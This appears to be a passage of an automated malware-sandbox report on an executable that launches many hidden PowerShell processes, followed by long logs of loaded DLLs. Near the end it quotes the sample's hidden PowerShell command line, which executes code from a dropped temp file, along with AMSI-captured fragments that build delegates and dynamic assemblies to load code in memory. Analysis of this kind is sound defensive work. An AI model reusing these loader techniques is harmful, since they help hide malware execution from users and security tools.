Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: vfhlZ0vrbe.exeStatic file information: File size 1366152 > 1048576
Source: vfhlZ0vrbe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fasciculately $Pragtfulde $Eksekutivmagtens), (Tryptamine @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Daphnioid = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dramatize)), $Hippiater).DefineDynamicModule($Lemniscus, $false).DefineType($Watercresses, $Blodhundes, [System.MulticastDelegate])$Pa
Suspicious powershell command line found
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lotteris=gc -raw 'C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\beccabunga.Heg';$Kogers=$Lotteris.SubString(12754,3);.$Kogers($Lotteris) "Jump to behavior
Source: C:\Users\user\Desktop\vfhlZ0vrbe.exeFile created: C:\Users\user\AppData\Local\Temp\nsw42F9.tmp\nsExec.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
